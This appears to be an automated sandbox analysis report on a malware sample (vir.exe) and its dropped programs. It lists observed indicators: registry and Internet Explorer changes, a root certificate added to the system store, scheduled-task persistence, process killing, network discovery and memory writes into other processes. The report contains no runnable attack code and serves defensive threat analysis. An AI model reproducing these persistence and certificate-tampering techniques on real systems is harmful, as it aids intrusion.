Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

296 ipconfig.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2784 taskkill.exe
3984 taskkill.exe
2120 taskkill.exe
2648 taskkill.exe

pid	process
296	ipconfig.exe

pid	process
2784	taskkill.exe
3984	taskkill.exe
2120	taskkill.exe
2648	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeiexplore.exereg.exeIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\13\IEPropFontName = "Shruti"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\5\IEPropFontName = "Times New Roman"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\37\IEFixedFontName = "Leelawadee UI"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\19\IEPropFontName = "Leelawadee UI"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\21\IEPropFontName = "Microsoft Himalaya"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\30\IEPropFontName = "Microsoft Yi Baiti"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\32\IEFixedFontName = "Times New Roman"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\12\IEFixedFontName = "Raavi"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\36	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\38\IEFixedFontName = "MV Boli"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\23\IEPropFontName = "Gulim"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\26\IEFixedFontName = "NSimsun"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\14\IEFixedFontName = "Kalinga"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\38	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{79671BB1-5B5C-11EF-BC5F-FE3EAF6E2A14} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7B34E671-5B5C-11EF-BC5F-FE3EAF6E2A14} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\11	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\39	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\22\IEFixedFontName = "Sylfaen"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\38\IEPropFontName = "MV Boli"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\18	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEFixedFontName = "Leelawadee UI"	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70f4db4869efda01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\18\IEPropFontName = "Kartika"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\15\IEPropFontName = "Vijaya"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\16\IEPropFontName = "Vani"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\27\IEPropFontName = "Ebrima"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\35	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\35\IEFixedFontName = "Estrangelo Edessa"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\4	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\17	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\7\IEPropFontName = "Times New Roman"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\International\Scripts\7\IEFixedFontName = "Times New Roman"	reg.exe

Modifies registry class 7 IoCs

Processes:

3.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\psiphon\shell	3.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\psiphon\shell\open	3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\\bloatware\\3.exe\" -- \"%1\""	3.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\psiphon	3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\psiphon\ = "URL:psiphon"	3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\psiphon\URL Protocol	3.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\psiphon\shell\open\command	3.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

psiphon-tunnel-core.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	psiphon-tunnel-core.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	psiphon-tunnel-core.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	psiphon-tunnel-core.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	psiphon-tunnel-core.exe

Runs net.exe

Runs ping.exe 1 TTPs 17 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
2932	PING.EXE
3820	PING.EXE
3412	PING.EXE
4056	PING.EXE
2500	PING.EXE
2856	PING.EXE
2640	PING.EXE
1028	PING.EXE
2128	PING.EXE
2560	PING.EXE
968	PING.EXE
3124	PING.EXE
2104	PING.EXE
2384	PING.EXE
1388	PING.EXE
2144	PING.EXE
3460	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
3180	schtasks.exe
2768	schtasks.exe
2888	schtasks.exe
2784	schtasks.exe
2656	schtasks.exe
2936	schtasks.exe
3284	schtasks.exe
2036	schtasks.exe
3040	schtasks.exe
1960	schtasks.exe
1064	schtasks.exe
1188	schtasks.exe
1044	schtasks.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

WinaeroTweaker-1.40.0.0-setup.tmppowershell.exe

pid process

3624 WinaeroTweaker-1.40.0.0-setup.tmp
3624 WinaeroTweaker-1.40.0.0-setup.tmp
3292 powershell.exe

pid	process
3624	WinaeroTweaker-1.40.0.0-setup.tmp
3624	WinaeroTweaker-1.40.0.0-setup.tmp
3292	powershell.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

tasklist.exetaskkill.exeRover.exetaskkill.exetaskkill.exetaskkill.exescary.exeRomilyaa.exepowershell.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exe

description	pid	process
Token: SeDebugPrivilege	1496	tasklist.exe
Token: SeDebugPrivilege	2120	taskkill.exe
Token: SeDebugPrivilege	2904	Rover.exe
Token: SeDebugPrivilege	2648	taskkill.exe
Token: SeDebugPrivilege	2784	taskkill.exe
Token: SeDebugPrivilege	3984	taskkill.exe
Token: SeDebugPrivilege	3920	scary.exe
Token: SeDebugPrivilege	2780	Romilyaa.exe
Token: SeDebugPrivilege	3292	powershell.exe
Token: SeDebugPrivilege	2540	Romilyaa.exe
Token: SeDebugPrivilege	1472	Romilyaa.exe
Token: SeDebugPrivilege	1096	Romilyaa.exe
Token: SeDebugPrivilege	1092	Romilyaa.exe
Token: SeDebugPrivilege	2928	Romilyaa.exe
Token: SeDebugPrivilege	3048	Romilyaa.exe
Token: SeDebugPrivilege	3152	Romilyaa.exe
Token: SeDebugPrivilege	3780	Romilyaa.exe
Token: SeDebugPrivilege	3392	Romilyaa.exe
Token: SeDebugPrivilege	3236	Romilyaa.exe
Token: SeDebugPrivilege	440	Romilyaa.exe
Token: SeDebugPrivilege	2556	Romilyaa.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

iexplore.exeefsui.exeiexplore.exeWinaeroTweaker-1.40.0.0-setup.tmp3.exeRover.exe

pid	process
2752	iexplore.exe
2628	efsui.exe
2628	efsui.exe
2628	efsui.exe
1140	iexplore.exe
3624	WinaeroTweaker-1.40.0.0-setup.tmp
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe
2904	Rover.exe

Suspicious use of SendNotifyMessage 29 IoCs

Processes:

efsui.exe3.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exe

pid	process
2628	efsui.exe
2628	efsui.exe
2628	efsui.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2744	3.exe
2780	Romilyaa.exe
2540	Romilyaa.exe
1472	Romilyaa.exe
1096	Romilyaa.exe
1092	Romilyaa.exe
2928	Romilyaa.exe
3048	Romilyaa.exe
3152	Romilyaa.exe
3780	Romilyaa.exe
3392	Romilyaa.exe
3236	Romilyaa.exe
440	Romilyaa.exe

Suspicious use of SetWindowsHookEx 21 IoCs

Processes:

iexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXE3.exeIEXPLORE.EXERomilyaa.exe

pid	process
2752	iexplore.exe
2752	iexplore.exe
2812	IEXPLORE.EXE
2812	IEXPLORE.EXE
1140	iexplore.exe
1140	iexplore.exe
404	IEXPLORE.EXE
404	IEXPLORE.EXE
2744	3.exe
2744	3.exe
1140	iexplore.exe
1140	iexplore.exe
2120	IEXPLORE.EXE
2120	IEXPLORE.EXE
2780	Romilyaa.exe
2120	IEXPLORE.EXE
2120	IEXPLORE.EXE
404	IEXPLORE.EXE
404	IEXPLORE.EXE
2812	IEXPLORE.EXE
2812	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

vir.execmd.execmd.execmd.exenet.exenet.exeiexplore.exe

description	pid	process	target process
PID 1916 wrote to memory of 2632	1916	vir.exe	cmd.exe
PID 1916 wrote to memory of 2632	1916	vir.exe	cmd.exe
PID 1916 wrote to memory of 2632	1916	vir.exe	cmd.exe
PID 1916 wrote to memory of 2632	1916	vir.exe	cmd.exe
PID 2632 wrote to memory of 572	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 572	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 572	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 572	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 2040	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 2040	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 2040	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 2040	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 2856	2632	cmd.exe	PING.EXE
PID 2632 wrote to memory of 2856	2632	cmd.exe	PING.EXE
PID 2632 wrote to memory of 2856	2632	cmd.exe	PING.EXE
PID 2632 wrote to memory of 2856	2632	cmd.exe	PING.EXE
PID 2040 wrote to memory of 296	2040	cmd.exe	ipconfig.exe
PID 2040 wrote to memory of 296	2040	cmd.exe	ipconfig.exe
PID 2040 wrote to memory of 296	2040	cmd.exe	ipconfig.exe
PID 2040 wrote to memory of 296	2040	cmd.exe	ipconfig.exe
PID 572 wrote to memory of 2452	572	cmd.exe	xcopy.exe
PID 572 wrote to memory of 2452	572	cmd.exe	xcopy.exe
PID 572 wrote to memory of 2452	572	cmd.exe	xcopy.exe
PID 572 wrote to memory of 2452	572	cmd.exe	xcopy.exe
PID 2040 wrote to memory of 616	2040	cmd.exe	net.exe
PID 2040 wrote to memory of 616	2040	cmd.exe	net.exe
PID 2040 wrote to memory of 616	2040	cmd.exe	net.exe
PID 2040 wrote to memory of 616	2040	cmd.exe	net.exe
PID 616 wrote to memory of 2732	616	net.exe	net1.exe
PID 616 wrote to memory of 2732	616	net.exe	net1.exe
PID 616 wrote to memory of 2732	616	net.exe	net1.exe
PID 616 wrote to memory of 2732	616	net.exe	net1.exe
PID 572 wrote to memory of 1260	572	cmd.exe	xcopy.exe
PID 572 wrote to memory of 1260	572	cmd.exe	xcopy.exe
PID 572 wrote to memory of 1260	572	cmd.exe	xcopy.exe
PID 572 wrote to memory of 1260	572	cmd.exe	xcopy.exe
PID 572 wrote to memory of 2932	572	cmd.exe	xcopy.exe
